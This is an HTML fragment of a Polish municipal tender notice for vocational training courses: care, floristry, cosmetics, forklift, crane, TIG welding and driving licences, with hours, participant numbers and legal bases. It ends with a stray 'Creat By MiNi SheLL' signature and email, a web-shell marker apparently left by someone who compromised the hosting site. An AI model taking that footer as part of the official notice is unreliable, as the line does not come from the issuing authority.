<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV:  Zorganizowanie i przeprowadzenie kursu - opiekun środowiskowy, kursu - florysta z obsługą kasy fiskalnej, kursu kosmetycznego:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Kurs - opiekun środowiskowy, Kod CPV: 80 53 00 00 - 8 - usługi szkolenia
        zawodowego, 80 53 00 00 9 - usługi szkoleniowe. 

	 Zakres zamówienia obejmuje następujące zagadnienia:
- wybrane zagadnienia prawne dotyczące w szczególności:  rehabilitacji zawodowej i społecznej osób niepełnosprawnych, rodzaje i  zasady korzystania ze  świadczeń opieki medycznej, rodzaje usług opiekuńczych i zasady korzystania z usług opiekuńczych, 
- wybrane zagadnienia z zakresu psychologii, 
- wybrane zagadnienia z zakresu gerontologii, 
- wybrane zagadnienia z zakresu psychiatrii, 
- dietetyka, 
- podstawy higieny i pielęgnacji, 
- udzielanie pomocy przedmedycznej,
- etyka.
Liczba uczestników	21 osób. 
Liczba  godzin	120 godzin, w tym 96 godzin zajęć teoretycznych oraz 24 godziny zajęć praktycznych. 


	B) Kurs - Florysta z obsługą kasy fiskalnej, Kod CPV: 80 53 00 00 - 8 - usługi szkolenia
       zawodowego,  80 53 00 00 9 - usługi szkoleniowe. 

Zakres zamówienia obejmuje teoretyczne i praktyczne przygotowanie uczestników do wykonywania pracy na stanowisku florysty. 
W wyniku kursu uczestnik powinien posiadać wiedzę na temat:
-	anatomii i fizjologii roślin, 
-	asortymentu roślin ozdobnych, 
-	sposobów utrwalania materiału roślinnego, 
-	narzędzi i środków technicznych, 
-	stylów w kompozycjach.
Po ukończeniu kursu uczestnik powinien nabyć umiejętności w zakresie:
-	florystyki ślubnej, 
-	florystyki żałobnej, 
-	dekoracji okolicznościowych, 
-	dekoracji doniczkowych, 
-	kompozycji z roślin suchych, sztucznych i preparowanych

oraz nabyć umiejętności w zakresie obsługi kasy fiskalnej (budowa i obsługa kasy fiskalnej, praca przy kasie fiskalnej - rejestracja sprzedaży i programowanie kas fiskalnych).
Liczba uczestników	4 osoby.  
Liczba  godzin	90 godzin, w tym 20 godzin zajęć teoretycznych oraz  70  godzin zajęć praktycznych. 









	C) Kurs kosmetyczny, Kod CPV: 80 53 00 00 - 8 - usługi szkolenia zawodowego,  80 53 00 00 9
    - usługi szkoleniowe. 

Zakres zamówienia obejmuje:
Ogólne informacje o skórze człowieka, preparatach do pielęgnacji skóry: 
-	specyfika pracy w gabinecie kosmetycznym, 
-	budowa i funkcje skóry, 
-	schorzenia skóry najczęściej spotykane w gabinecie kosmetycznym,
-	proces starzenia się skóry, 
-	substancje czynne w preparatach kosmetycznych, 
-	preparaty do pielęgnacji skóry, 
-	preparaty w ampułkach, 
-	warunki przystąpienia do zabiegu kosmetycznego.
Pielęgnacja i oczyszczanie skóry: 
-	profesjonalny demakijaż, 
-	rodzaje peelingów, 
-	techniki złuszczania skóry, 
-	mechaniczne oczyszczanie skóry, 
-	maski kosmetyczne, 
-	zabiegi regeneracyjne na twarz, 
-	zabiegi specjalne na twarz - z siarką, glinkami, cynkiem, rutyną itp., 
-	elektrolecznictwo w kosmetyce, 
-	depilacja woskiem - usuwanie zbędnego owłosienia, 
-	masaż twarzy, szyi, dekoltu, 
-	henna brwi i rzęs. 
Wykonawca powinien zapewnić uczestnikowi zestaw podstawowych narzędzi i kosmetyków niezbędnych do wykonania ćwiczeń. 
Liczba uczestników	6 osób. 
Liczba  godzin	80 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V: Zorganizowanie i przeprowadzenie kursu kierowca - operator wózków jezdniowych, kursu operator suwnicy oraz kursu podstawowego  spawania metodą TIG - 141:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Kurs  kierowca - operator wózków jezdniowych, Kod CPV: 80 53 00 00 8 
      usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe.  

Kurs ma na celu  przygotowanie uczestników do wykonywania zawodu kierowcy - operatora wózków  jezdniowych z napędem silnikowym i uprawnieniami UDT wraz z  bezpieczną wymianą butli gazowych. 
Kurs musi być przeprowadzony zgodnie z przepisami  prawa w zakresie go obejmującym, 
w szczególności z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2013 r., poz. 963 z późn. zm.), ustawą z dnia 06 września 2001 r. o transporcie drogowym (Dz. U. z 2013 r., poz. 1414 z późn. zm.) - w zakresie dotyczącym kwalifikacji zawodowej w zawodzie kierowcy - operatora wózków jezdniowych,   rozporządzeniem Ministra Gospodarki z dnia 18 lipca 2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. Nr 79, poz. 849 z późn. zm.), rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70,  poz. 650 z późn. zm.). 
Program szkolenia (minimum 67 godzin) musi wyczerpywać tematykę niezbędną w celu prawidłowego przygotowania uczestników do wykonywania zawodu kierowcy - operatora wózków jezdniowych. Wykonawca jest zobowiązany do zorganizowania i skierowania uczestników na badania (np. lekarskie, psychologiczne) - w przypadku gdy uczestnik  nie posiada aktualnych badań w tym zakresie, a takie badania okażą się  wymagane w świetle przepisów obowiązującego prawa, oraz pokrycia kosztów przeprowadzenia tych badań. 
Kurs musi kończyć się egzaminem przed komisją kwalifikacyjną powołaną przez organ właściwej jednostki Urzędu Dozoru Technicznego i wydaniem zaświadczenia kwalifikacyjnego, o którym mowa w rozporządzeniu Ministra Gospodarki z dnia 18 lipca 2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych. 
Koszt kursu obejmuje sfinansowanie opłaty za  egzamin  (pierwszy) przed komisją kwalifikacyjną, nadającą uprawnienia.
Liczba uczestników	 26 osób.   
Liczba  godzin	zgodnie z obowiązującymi przepisami w tym zakresie.  



	B) Kurs - operator suwnicy - kat. I S,  Kod CPV:  80 53 00 00  8  usługi szkolenia zawodowego,  80 53 00 00 9- usługi szkoleniowe. 

Celem kursu jest praktyczne przygotowanie uczestnika do egzaminu przeprowadzanego przez właściwą jednostkę dozoru technicznego w celu uzyskania uprawnień do obsługi suwnic hakowych sterowanych z kabiny (praca na wysokości).  
Kurs powinien być prowadzony zgodnie z przepisami obowiązującymi w tym zakresie, a w szczególności z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2013 r., poz. 963 z późn. zm.), rozporządzeniem Ministra Gospodarki z dnia 18 lipca  2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji  urządzeń technicznych (Dz. U. Nr 79, poz. 849 z późn. zm.) oraz  rozporządzeniem  Rady Ministrów z dnia 7 grudnia 2012 r. w sprawie  rodzajów urządzeń  technicznych podlegających dozorowi technicznemu (Dz. U. poz. 1468). 

Sposób zakończenia kursu:
Egzamin przed komisją egzaminacyjną, powołaną przez właściwy organ dozoru technicznego. 
Wykonawca pokrywa koszty zlecenia i wykonania niezbędnych badań lekarskich (w tym: badanie psychologiczne, badanie lekarskie stwierdzające przydatność do wykonywania obsługi suwnic) oraz koszty egzaminu przed właściwą jednostką dozoru technicznego (pierwszy egzamin). 

Liczba uczestników	  1 osoba.  
Liczba  godzin	 zgodnie z obowiązującymi przepisami. 



C) Kurs podstawowy spawania metodą TIG - 141, Kod CPV: 80 53 00 00 - 8 - usługi szkolenia zawodowego, 80 53 00 00 9 - usługi szkoleniowe.  

Kurs spawania blach i rur spoinami pachwinowymi metodą TIG. 
Kurs powinien zapewnić zdobycie przez  uczestników  umiejętności spawania metodą TIG - 141 (spawania łukowego elektrodą wolframową) w zakresie wykonywania spoin  pachwinowych  w złączach blach i rur. 
Po ukończeniu  kursu uczestnik  powinien umieć: przygotować elementy do spawania (w tym brzegi do spawania), dobierać materiały dodatkowe (gatunek i średnicę)  dla danego materiału podstawowego (gatunek, grubość), czytać rysunki prostych konstrukcji spawanych, uruchamiać i obsługiwać urządzenia spawalnicze, dobierać parametry spawania, wykonać złącza blach i rur ze spoinami pachwinowymi w poszczególnych pozycjach zgodnie z uzyskanymi  kwalifikacjami/uprawnieniami, oceniać jakość wykonywanych przez siebie złączy spawanych, stosować  odpowiednie środki ochrony indywidualnej i obsługiwać podręczny sprzęt przeciwpożarowy, udzielać pierwszej pomocy w nagłych wypadkach, postępować w razie pożaru powstałego w wyniku prac spawalniczych.
Kurs powinien być prowadzony zgodnie z przepisami obowiązującymi w tym zakresie, a w szczególności z rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40, poz. 470) oraz rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa  i higieny pracy (Dz. U. z 2003 r. Nr 169, poz. 1650, z późn. zm.),  a także wytycznymi Instytutu Spawalnictwa. 

Wykonawca pokrywa koszty zlecenia i wykonania niezbędnych badań lekarskich oraz koszty egzaminu końcowego przed Komisją Egzaminacyjną Instytutu Spawalnictwa oraz wydania książeczki spawacza i świadectwa egzaminu spawacza  (pierwszy egzamin).
Liczba uczestników	5 osób. 
Liczba  godzin	zgodnie z obowiązującymi przepisami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie VI:   Zorganizowanie i przeprowadzenie kursów prawa jazdy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa: 	A) Kurs prawa jazdy kat. B, Kod CPV: 804 11 200  4 - usługi szkół nauki
       jazdy,  805 300 00 9 - usługi szkoleniowe. 

	Zajęcia muszą być prowadzone zgodnie z obowiązującym prawem, w oparciu m. in. o ustawę
 z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012  r., poz. 1137 z późn. zm.),  ustawę z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2014 r. poz. 600), rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do  kierowania pojazdami, instruktorów i wykładowców (Dz. U. z 2012 r. poz. 1019),  rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów  stosowanych w tych sprawach (Dz. U. z 2012 r., poz. 995 z późn. zm.) oraz inne akty prawne niezbędne do  prawidłowej realizacji zamówienia. 
W ramach szkolenia uczestnik nabędzie wiedzę i umiejętności pozwalające przystąpić do egzaminu na prawo jazdy kategorii B.
Przed rozpoczęciem zajęć, Wykonawca zobowiązany jest zorganizować,  skierować uczestników szkolenia na badania lekarskie, potwierdzające brak przeciwwskazań zdrowotnych do kierowania pojazdami oraz sfinansować koszty tych badań. 
Wykonawca ma obowiązek zorganizować i przeprowadzić egzamin wewnętrzny  dla każdego uczestnika szkolenia zgodnie z obowiązującymi przepisami prawa. Wykonawca  ma obowiązek  przygotowania i  wydania uczestnikom, którzy ukończyli szkolenie zaświadczenia o  ukończeniu  szkolenia. 
Praktyczne zajęcia szkoleniowe mogą odbywać się poza miastem Tarnowa, z tym zastrzeżeniem, że uczestnik szkolenia rozpoczyna i kończy  każde zajęcia szkoleniowe na terenie miasta  Tarnowa. 
Liczba uczestników	12 osób.  
Liczba  godzin 	60 godzin, w tym: 30 godzin zajęć teoretycznych, 30 godzin zajęć praktycznych (po  60 minut).  



B)  Kurs prawa jazdy kategorii C, Kod CPV: 804 11 200  4 - usługi szkół nauki
       jazdy, 805 300 00 9 - usługi szkoleniowe. 	
Zajęcia muszą być prowadzone zgodnie  z obowiązującym prawem, w oparciu m. in. o ustawę z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012  r., poz. 1137 z późn. zm.),  ustawę z dnia 5 stycznia  2011 r. o kierujących pojazdami (Dz. U. z 2014 r. poz. 600), rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. z 2012 r. poz. 1019), rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów  stosowanych w tych sprawach (Dz. U. z 2012 r., poz. 995 z późn. zm.) oraz inne akty prawne niezbędne do  prawidłowej realizacji zamówienia. 
W ramach szkolenia uczestnik nabędzie wiedzę i umiejętności pozwalające przystąpić do egzaminu na prawo jazdy kategorii C.
Przed rozpoczęciem zajęć, Wykonawca zobowiązany jest zorganizować i skierować uczestników szkolenia na badania lekarskie i psychologiczne, potwierdzające brak przeciwwskazań  do kierowania pojazdami oraz sfinansować koszty tych badań.
Wykonawca ma obowiązek zorganizować i przeprowadzić egzamin wewnętrzny dla każdego uczestnika szkolenia zgodnie z obowiązującymi przepisami prawa. Wykonawca  ma obowiązek  przygotowania i  wydania uczestnikom, którzy ukończyli szkolenie zaświadczenia o  ukończeniu  szkolenia. 
Teoretyczne zajęcia szkoleniowe muszą odbywać się na terenie miasta Tarnowa.  Praktyczne zajęcia szkoleniowe mogą odbywać się poza miastem Tarnowem, z tym zastrzeżeniem, że uczestnik szkolenia rozpoczyna i kończy każde zajęcia szkoleniowe na terenie miasta  Tarnowa.  
Liczba uczestników	 3 osoby.  
Liczba  godzin	 50 godzin,  w tym: 20 godzin - zajęcia teoretyczne, 30 godzin - zajęcia praktyczne 
(po 60 minut). 



	C)  Kurs prawa jazdy kategorii C + E, Kod CPV: 804 11 200  4 - usługi szkół nauki
       jazdy,  805 300 00 9 - usługi szkoleniowe. 
Zajęcia muszą być prowadzone zgodnie  z obowiązującym prawem, w oparciu m. in. o ustawę z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012  r., poz. 1137 z późn. zm.),  ustawę z dnia 5 stycznia  2011 r. o kierujących pojazdami (Dz. U. z 2014 r. poz. 600), rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. z 2012 r. poz. 1019), rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów  stosowanych w tych sprawach (Dz. U. z 2012 r., poz. 995 z późn. zm.) oraz inne akty prawne niezbędne do  prawidłowej realizacji zamówienia. 
W ramach szkolenia uczestnik nabędzie wiedzę i umiejętności pozwalające przystąpić do egzaminu na prawo jazdy kategorii C + E.
Przed rozpoczęciem zajęć, Wykonawca zobowiązany jest zorganizować i skierować uczestników szkolenia na badania lekarskie i psychologiczne, potwierdzające brak przeciwwskazań  do kierowania pojazdami  oraz sfinansować koszty tych badań.
Wykonawca ma obowiązek zorganizować i przeprowadzić egzamin wewnętrzny dla każdego uczestnika szkolenia zgodnie z obowiązującymi przepisami prawa. Wykonawca  ma obowiązek  przygotowania i  wydania uczestnikom, którzy ukończyli szkolenie zaświadczenia o  ukończeniu  szkolenia. 
Teoretyczne zajęcia szkoleniowe muszą odbywać się na terenie miasta Tarnowa. Praktyczne zajęcia szkoleniowe mogą odbywać się poza miastem Tarnowem, z tym zastrzeżeniem, że uczestnik szkolenia rozpoczyna i kończy każde zajęcia szkoleniowe na terenie miasta  Tarnowa.  
Liczba uczestników	 3 osoby.  
Liczba  godzin	 50 godzin,  w tym: 20 godzin - zajęcia teoretyczne, 30 godzin - zajęcia praktyczne 
(po 60 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-4, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com